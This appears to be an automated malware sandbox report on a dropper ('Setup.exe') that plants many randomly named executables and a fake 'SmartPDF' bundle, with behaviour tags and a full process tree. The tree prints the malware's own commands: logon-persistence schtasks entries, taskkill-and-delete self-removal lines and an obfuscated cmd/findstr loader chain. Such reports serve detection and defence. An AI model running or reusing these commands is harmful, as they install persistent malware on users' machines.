f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e Setup.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349 Setup.exe -
Runs ping.exe 1 TTPs 1 IoCs
-
Script User-Agent 3 IoCs
Uses user-agent string associated with script host/environment.
Processes:
description flow ioc HTTP User-Agent header 119 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 124 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 394 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) -
Suspicious behavior: EnumeratesProcesses 25 IoCs
Processes:
OneDriveStandaloneUpdater.exeSetup.exeWerFault.exepid process 516 OneDriveStandaloneUpdater.exe 516 OneDriveStandaloneUpdater.exe 516 OneDriveStandaloneUpdater.exe 516 OneDriveStandaloneUpdater.exe 508 Setup.exe 508 Setup.exe 5036 WerFault.exe 5036 WerFault.exe 5036 WerFault.exe 5036 WerFault.exe 5036 WerFault.exe 5036 WerFault.exe 5036 WerFault.exe 5036 WerFault.exe 5036 WerFault.exe 5036 WerFault.exe 5036 WerFault.exe 5036 WerFault.exe 5036 WerFault.exe 5036 WerFault.exe 5036 WerFault.exe 5036 WerFault.exe 5036 WerFault.exe 5036 WerFault.exe 5036 WerFault.exe -
Suspicious use of AdjustPrivilegeToken 4 IoCs
Processes:
9mqE7ddKs1O09wKSholqPSoG.exeWerFault.exedescription pid process Token: SeDebugPrivilege 1472 9mqE7ddKs1O09wKSholqPSoG.exe Token: SeRestorePrivilege 5036 WerFault.exe Token: SeBackupPrivilege 5036 WerFault.exe Token: SeDebugPrivilege 5036 WerFault.exe -
Suspicious use of FindShellTrayWindow 1 IoCs
Processes:
4bNPM6sKOX2oYBMUz4QrBqSP.tmppid process 4652 4bNPM6sKOX2oYBMUz4QrBqSP.tmp -
Suspicious use of SetWindowsHookEx 2 IoCs
Processes:
OfficeC2RClient.exeOfficeC2RClient.exepid process 572 OfficeC2RClient.exe 212 OfficeC2RClient.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
Setup.exeOneDriveStandaloneUpdater.exe4bNPM6sKOX2oYBMUz4QrBqSP.exedescription pid process target process PID 508 wrote to memory of 1472 508 Setup.exe 9mqE7ddKs1O09wKSholqPSoG.exe PID 508 wrote to memory of 1472 508 Setup.exe 9mqE7ddKs1O09wKSholqPSoG.exe PID 508 wrote to memory of 1472 508 Setup.exe 9mqE7ddKs1O09wKSholqPSoG.exe PID 508 wrote to memory of 2120 508 Setup.exe cFn2qvDmPErwLIIqQl73UGcj.exe PID 508 wrote to memory of 2120 508 Setup.exe cFn2qvDmPErwLIIqQl73UGcj.exe PID 508 wrote to memory of 4080 508 Setup.exe hCYV1iHrYQwv8E3zOWNX11r3.exe PID 508 wrote to memory of 4080 508 Setup.exe hCYV1iHrYQwv8E3zOWNX11r3.exe PID 508 wrote to memory of 4080 508 Setup.exe hCYV1iHrYQwv8E3zOWNX11r3.exe PID 508 wrote to memory of 808 508 Setup.exe 3XigsTU6eAHS_B0eWt2m9GcW.exe PID 508 wrote to memory of 808 508 Setup.exe 3XigsTU6eAHS_B0eWt2m9GcW.exe PID 508 wrote to memory of 808 508 Setup.exe 3XigsTU6eAHS_B0eWt2m9GcW.exe PID 508 wrote to memory of 2624 508 Setup.exe mhWe_FDhSpNOUE8tGRp7tzbG.exe PID 508 wrote to memory of 2624 508 Setup.exe mhWe_FDhSpNOUE8tGRp7tzbG.exe PID 508 wrote to memory of 2624 508 Setup.exe mhWe_FDhSpNOUE8tGRp7tzbG.exe PID 508 wrote to memory of 372 508 Setup.exe Z93VzqaNWtjd5VRixOVgMODo.exe PID 508 wrote to memory of 372 508 Setup.exe Z93VzqaNWtjd5VRixOVgMODo.exe PID 508 wrote to memory of 372 508 Setup.exe Z93VzqaNWtjd5VRixOVgMODo.exe PID 508 wrote to memory of 1256 508 Setup.exe eVtDy2kmSwURtva2vBMA9qU6.exe PID 508 wrote to memory of 1256 508 Setup.exe eVtDy2kmSwURtva2vBMA9qU6.exe PID 508 wrote to memory of 1256 508 Setup.exe eVtDy2kmSwURtva2vBMA9qU6.exe PID 508 wrote to memory of 2540 508 Setup.exe zsI5t_eJTJVnSpRUvfyY0ZV0.exe PID 508 wrote to memory of 2540 508 Setup.exe zsI5t_eJTJVnSpRUvfyY0ZV0.exe PID 508 wrote to memory of 2540 508 Setup.exe zsI5t_eJTJVnSpRUvfyY0ZV0.exe PID 508 wrote to memory of 1020 508 Setup.exe 2dRkySXfpzhrHfXqbMfr2Dh6.exe PID 508 wrote to memory of 1020 508 Setup.exe 2dRkySXfpzhrHfXqbMfr2Dh6.exe PID 508 wrote to memory of 1020 508 Setup.exe 2dRkySXfpzhrHfXqbMfr2Dh6.exe PID 508 wrote to memory of 4144 508 Setup.exe Juy1Klom0iHRt0cpliJhPTvO.exe PID 508 wrote to memory of 4144 508 Setup.exe Juy1Klom0iHRt0cpliJhPTvO.exe PID 508 wrote to memory of 4144 508 Setup.exe Juy1Klom0iHRt0cpliJhPTvO.exe PID 508 wrote to memory of 1796 508 Setup.exe iZXDunGUmJUrMAjkcm1HiYnD.exe PID 508 wrote to memory of 1796 508 Setup.exe iZXDunGUmJUrMAjkcm1HiYnD.exe PID 508 wrote to memory of 1796 508 Setup.exe iZXDunGUmJUrMAjkcm1HiYnD.exe PID 508 wrote to memory of 1764 508 Setup.exe pn1CRHJihlF7AUiO8r9WkjsW.exe PID 508 wrote to memory of 1764 508 Setup.exe pn1CRHJihlF7AUiO8r9WkjsW.exe PID 508 wrote to memory of 1764 508 Setup.exe pn1CRHJihlF7AUiO8r9WkjsW.exe PID 508 wrote to memory of 4136 508 Setup.exe 3CzjcI0lz_q8pGaAxMLxiexU.exe PID 508 wrote to memory of 4136 508 Setup.exe 3CzjcI0lz_q8pGaAxMLxiexU.exe PID 508 wrote to memory of 4136 508 Setup.exe 3CzjcI0lz_q8pGaAxMLxiexU.exe PID 508 wrote to memory of 4112 508 Setup.exe B6yowxV8LsKL_sh6fD4dEqTq.exe PID 508 wrote to memory of 4112 508 Setup.exe B6yowxV8LsKL_sh6fD4dEqTq.exe PID 508 wrote to memory of 4120 508 Setup.exe 09WJtjb0y0ANJSkCvy24hF8U.exe PID 508 wrote to memory of 4120 508 Setup.exe 09WJtjb0y0ANJSkCvy24hF8U.exe PID 508 wrote to memory of 4120 508 Setup.exe 09WJtjb0y0ANJSkCvy24hF8U.exe PID 508 wrote to memory of 4104 508 Setup.exe Uw2nsLbf3aKDMOvE9SBpKWI8.exe PID 508 wrote to memory of 4104 508 Setup.exe Uw2nsLbf3aKDMOvE9SBpKWI8.exe PID 508 wrote to memory of 4104 508 Setup.exe Uw2nsLbf3aKDMOvE9SBpKWI8.exe PID 508 wrote to memory of 2208 508 Setup.exe zUJh9p7ry0bJHslkedqN_gmr.exe PID 508 wrote to memory of 2208 508 Setup.exe zUJh9p7ry0bJHslkedqN_gmr.exe PID 508 wrote to memory of 2208 508 Setup.exe zUJh9p7ry0bJHslkedqN_gmr.exe PID 508 wrote to memory of 4128 508 Setup.exe rwtUE2DGUjdKpne200zgB3n4.exe PID 508 wrote to memory of 4128 508 Setup.exe rwtUE2DGUjdKpne200zgB3n4.exe PID 508 wrote to memory of 4128 508 Setup.exe rwtUE2DGUjdKpne200zgB3n4.exe PID 508 wrote to memory of 4200 508 Setup.exe ybDkP2sQ6_pLyun1GoApuo9P.exe PID 508 wrote to memory of 4200 508 Setup.exe ybDkP2sQ6_pLyun1GoApuo9P.exe PID 508 wrote to memory of 4200 508 Setup.exe ybDkP2sQ6_pLyun1GoApuo9P.exe PID 508 wrote to memory of 4212 508 Setup.exe 4bNPM6sKOX2oYBMUz4QrBqSP.exe PID 508 wrote to memory of 4212 508 Setup.exe 4bNPM6sKOX2oYBMUz4QrBqSP.exe PID 508 wrote to memory of 4212 508 Setup.exe 4bNPM6sKOX2oYBMUz4QrBqSP.exe PID 516 wrote to memory of 4224 516 OneDriveStandaloneUpdater.exe OneDriveSetup.exe PID 516 wrote to memory of 4224 516 OneDriveStandaloneUpdater.exe OneDriveSetup.exe PID 516 wrote to memory of 4224 516 OneDriveStandaloneUpdater.exe OneDriveSetup.exe PID 4212 wrote to memory of 4652 4212 4bNPM6sKOX2oYBMUz4QrBqSP.exe 4bNPM6sKOX2oYBMUz4QrBqSP.tmp PID 4212 wrote to memory of 4652 4212 4bNPM6sKOX2oYBMUz4QrBqSP.exe 4bNPM6sKOX2oYBMUz4QrBqSP.tmp PID 4212 wrote to memory of 4652 4212 4bNPM6sKOX2oYBMUz4QrBqSP.exe 4bNPM6sKOX2oYBMUz4QrBqSP.tmp
Processes
-
C:\Users\Admin\AppData\Local\Temp\Setup.exe"C:\Users\Admin\AppData\Local\Temp\Setup.exe"1⤵
- Checks computer location settings
- Modifies system certificate store
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\Documents\hCYV1iHrYQwv8E3zOWNX11r3.exe"C:\Users\Admin\Documents\hCYV1iHrYQwv8E3zOWNX11r3.exe"2⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4080 -s 7363⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4080 -s 7483⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4080 -s 7963⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4080 -s 8163⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4080 -s 11883⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4080 -s 12243⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4080 -s 12443⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4080 -s 13123⤵
- Executes dropped EXE
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4080 -s 12763⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4080 -s 13843⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4080 -s 12363⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4080 -s 14283⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4080 -s 14883⤵
- Program crash
-
C:\Users\Admin\Documents\cFn2qvDmPErwLIIqQl73UGcj.exe"C:\Users\Admin\Documents\cFn2qvDmPErwLIIqQl73UGcj.exe"2⤵
- Executes dropped EXE
-
C:\Users\Admin\Documents\9mqE7ddKs1O09wKSholqPSoG.exe"C:\Users\Admin\Documents\9mqE7ddKs1O09wKSholqPSoG.exe"2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe"3⤵
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe"4⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe"3⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=93.0.4577.63 --initial-client-data=0xc8,0xcc,0xd0,0xa4,0xd4,0x7ff9c20aa380,0x7ff9c20aa390,0x7ff9c20aa3a04⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --field-trial-handle=1628,8923328689901226590,3348843770325589711,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1660 /prefetch:24⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1628,8923328689901226590,3348843770325589711,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2104 /prefetch:84⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1628,8923328689901226590,3348843770325589711,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1712 /prefetch:84⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1628,8923328689901226590,3348843770325589711,131072 --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2672 /prefetch:14⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1628,8923328689901226590,3348843770325589711,131072 --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2680 /prefetch:14⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --extension-process --field-trial-handle=1628,8923328689901226590,3348843770325589711,131072 --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=4 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3460 /prefetch:14⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --extension-process --field-trial-handle=1628,8923328689901226590,3348843770325589711,131072 --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3544 /prefetch:14⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --extension-process --field-trial-handle=1628,8923328689901226590,3348843770325589711,131072 --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3668 /prefetch:14⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --extension-process --field-trial-handle=1628,8923328689901226590,3348843770325589711,131072 --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3824 /prefetch:14⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --field-trial-handle=1628,8923328689901226590,3348843770325589711,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1756 /prefetch:84⤵
-
C:\Program Files\Google\Chrome\Application\93.0.4577.63\Installer\chrmstp.exe"C:\Program Files\Google\Chrome\Application\93.0.4577.63\Installer\chrmstp.exe" --configure-user-settings --verbose-logging --system-level --channel=stable --force-configure-user-settings4⤵
-
C:\Program Files\Google\Chrome\Application\93.0.4577.63\Installer\chrmstp.exe"C:\Program Files\Google\Chrome\Application\93.0.4577.63\Installer\chrmstp.exe" --type=crashpad-handler /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Windows\TEMP\Crashpad --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=93.0.4577.63 --initial-client-data=0x240,0x244,0x248,0x21c,0x24c,0x7ff75c8f6ee0,0x7ff75c8f6ef0,0x7ff75c8f6f005⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1628,8923328689901226590,3348843770325589711,131072 --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=5056 /prefetch:84⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1628,8923328689901226590,3348843770325589711,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3668 /prefetch:84⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --field-trial-handle=1628,8923328689901226590,3348843770325589711,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=5140 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.15063.0 --gpu-preferences=UAAAAAAAAADoAAAQAAAAAAAAAAAAAAAAAABgAAAQAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=988 /prefetch:24⤵
-
C:\Windows\SysWOW64\cmd.exe"cmd.exe" /C taskkill /F /PID 1472 && choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\Documents\9mqE7ddKs1O09wKSholqPSoG.exe"3⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /PID 14724⤵
- Kills process with taskkill
-
C:\Windows\SysWOW64\cmd.exe"cmd.exe" /C taskkill /F /PID 1472 && choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\Documents\9mqE7ddKs1O09wKSholqPSoG.exe"3⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /PID 14724⤵
- Kills process with taskkill
-
C:\Users\Admin\Documents\4bNPM6sKOX2oYBMUz4QrBqSP.exe"C:\Users\Admin\Documents\4bNPM6sKOX2oYBMUz4QrBqSP.exe"2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\is-ED6L4.tmp\4bNPM6sKOX2oYBMUz4QrBqSP.tmp"C:\Users\Admin\AppData\Local\Temp\is-ED6L4.tmp\4bNPM6sKOX2oYBMUz4QrBqSP.tmp" /SL5="$501EC,138429,56832,C:\Users\Admin\Documents\4bNPM6sKOX2oYBMUz4QrBqSP.exe"3⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of FindShellTrayWindow
-
C:\Users\Admin\AppData\Local\Temp\is-QG8OP.tmp\Setup.exe"C:\Users\Admin\AppData\Local\Temp\is-QG8OP.tmp\Setup.exe" /Verysilent4⤵
-
C:\Program Files (x86)\SmartPDF\SmartPDF\lg.exe"C:\Program Files (x86)\SmartPDF\SmartPDF\lg.exe"5⤵
-
C:\Program Files (x86)\SmartPDF\SmartPDF\lg.exe"C:\Program Files (x86)\SmartPDF\SmartPDF\lg.exe" -a6⤵
-
C:\Program Files (x86)\SmartPDF\SmartPDF\stats.exe"C:\Program Files (x86)\SmartPDF\SmartPDF\stats.exe" /Verysilent5⤵
-
C:\Users\Admin\AppData\Local\Temp\is-A1LN6.tmp\stats.tmp"C:\Users\Admin\AppData\Local\Temp\is-A1LN6.tmp\stats.tmp" /SL5="$2031E,138429,56832,C:\Program Files (x86)\SmartPDF\SmartPDF\stats.exe" /Verysilent6⤵
-
C:\Users\Admin\AppData\Local\Temp\is-AQQFH.tmp\Setup.exe"C:\Users\Admin\AppData\Local\Temp\is-AQQFH.tmp\Setup.exe" /Verysilent7⤵
-
C:\Users\Admin\Documents\Gy8rweKeO4G4iJlEyKLF5tAG.exe"C:\Users\Admin\Documents\Gy8rweKeO4G4iJlEyKLF5tAG.exe"8⤵
-
C:\Windows\SysWOW64\cmd.exe"cmd.exe" /C taskkill /F /PID 13872 && choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\Documents\Gy8rweKeO4G4iJlEyKLF5tAG.exe"9⤵
-
C:\Windows\SysWOW64\cmd.exe"cmd.exe" /C taskkill /F /PID 13872 && choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\Documents\Gy8rweKeO4G4iJlEyKLF5tAG.exe"9⤵
-
C:\Users\Admin\Documents\fRJz5pa2RmfeRXxW536sqA3J.exe"C:\Users\Admin\Documents\fRJz5pa2RmfeRXxW536sqA3J.exe"8⤵
-
C:\Users\Admin\Documents\Psio7dxMSRnm3OkUTWMtt4EW.exe"C:\Users\Admin\Documents\Psio7dxMSRnm3OkUTWMtt4EW.exe"8⤵
-
C:\Users\Admin\Documents\OJk20sdvwixHdXZD1GgM6gJL.exe"C:\Users\Admin\Documents\OJk20sdvwixHdXZD1GgM6gJL.exe"8⤵
-
C:\Users\Admin\Documents\7f7q18Os2M3t0ILLgaO3wrDh.exe"C:\Users\Admin\Documents\7f7q18Os2M3t0ILLgaO3wrDh.exe"8⤵
-
C:\Users\Admin\Documents\_nQ1RxGfTsNBjuAnQrFOc88Y.exe"C:\Users\Admin\Documents\_nQ1RxGfTsNBjuAnQrFOc88Y.exe"8⤵
-
C:\Users\Admin\Documents\VZC2YxK6u4mGNZcgNP2JIL5o.exe"C:\Users\Admin\Documents\VZC2YxK6u4mGNZcgNP2JIL5o.exe"8⤵
-
C:\Users\Admin\Documents\Rqd9dGRf8kVw0fiCsZXqrK1Z.exe"C:\Users\Admin\Documents\Rqd9dGRf8kVw0fiCsZXqrK1Z.exe"8⤵
-
C:\Program Files (x86)\SmartPDF\SmartPDF\SmartPDF.exe"C:\Program Files (x86)\SmartPDF\SmartPDF\SmartPDF.exe"5⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services32" /tr '"C:\Users\Admin\services32.exe"' & exit6⤵
-
C:\Windows\system32\schtasks.exeschtasks /create /f /sc onlogon /rl highest /tn "services32" /tr '"C:\Users\Admin\services32.exe"'7⤵
- Creates scheduled task(s)
-
C:\Users\Admin\services32.exe"C:\Users\Admin\services32.exe"6⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services32" /tr '"C:\Users\Admin\services32.exe"' & exit7⤵
-
C:\Windows\system32\schtasks.exeschtasks /create /f /sc onlogon /rl highest /tn "services32" /tr '"C:\Users\Admin\services32.exe"'8⤵
- Creates scheduled task(s)
-
C:\Users\Admin\AppData\Roaming\Microsoft\Telemetry\sihost32.exe"C:\Users\Admin\AppData\Roaming\Microsoft\Telemetry\sihost32.exe"7⤵
-
C:\Program Files (x86)\SmartPDF\SmartPDF\note866.exe"C:\Program Files (x86)\SmartPDF\SmartPDF\note866.exe"5⤵
-
C:\Program Files (x86)\SmartPDF\SmartPDF\LivelyScreenRecS3.0.exe"C:\Program Files (x86)\SmartPDF\SmartPDF\LivelyScreenRecS3.0.exe"5⤵
-
C:\Users\Admin\AppData\Local\Temp\tmp47BE_tmp.exe"C:\Users\Admin\AppData\Local\Temp\tmp47BE_tmp.exe"6⤵
-
C:\Windows\SysWOW64\dllhost.exedllhost.exe7⤵
-
C:\Windows\SysWOW64\cmd.execmd /c cmd < Pei.xll7⤵
-
C:\Windows\SysWOW64\cmd.execmd8⤵
-
C:\Windows\SysWOW64\findstr.exefindstr /V /R "^HlGEvpOWJOEhLjtMCMDsxiaRDGubGurupaMHjGXUgfrcGybsXUFbdIsmSOwQrdfCLnrzmbAVPJrtrXlnpOAMBGPBqjObFuRXZBJowtRmxKIHEjcVEDHgPDwyIBahIedISyy$" Passa.xll9⤵
-
C:\Windows\SysWOW64\PING.EXEping localhost9⤵
- Runs ping.exe
-
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Tra.exe.comTra.exe.com o9⤵
-
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Tra.exe.comC:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Tra.exe.com o10⤵
-
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Tra.exe.comC:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Tra.exe.com o11⤵
-
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Tra.exe.comC:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Tra.exe.com o12⤵
-
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Tra.exe.comC:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Tra.exe.com o13⤵
-
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Tra.exe.comC:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Tra.exe.com o14⤵
-
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Tra.exe.comC:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Tra.exe.com o15⤵
-
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Tra.exe.comC:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Tra.exe.com o16⤵
-
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Tra.exe.comC:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Tra.exe.com o17⤵
-
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Tra.exe.comC:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Tra.exe.com o18⤵
-
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Tra.exe.comC:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Tra.exe.com o19⤵
-
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Tra.exe.comC:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Tra.exe.com o20⤵
-
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Tra.exe.comC:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Tra.exe.com o21⤵
-
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Tra.exe.comC:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Tra.exe.com o22⤵
-
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Tra.exe.comC:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Tra.exe.com o23⤵
-
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Tra.exe.comC:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Tra.exe.com o24⤵
-
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Tra.exe.comC:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Tra.exe.com o25⤵
-
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Tra.exe.comC:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Tra.exe.com o26⤵
-
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Tra.exe.comC:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Tra.exe.com o27⤵
-
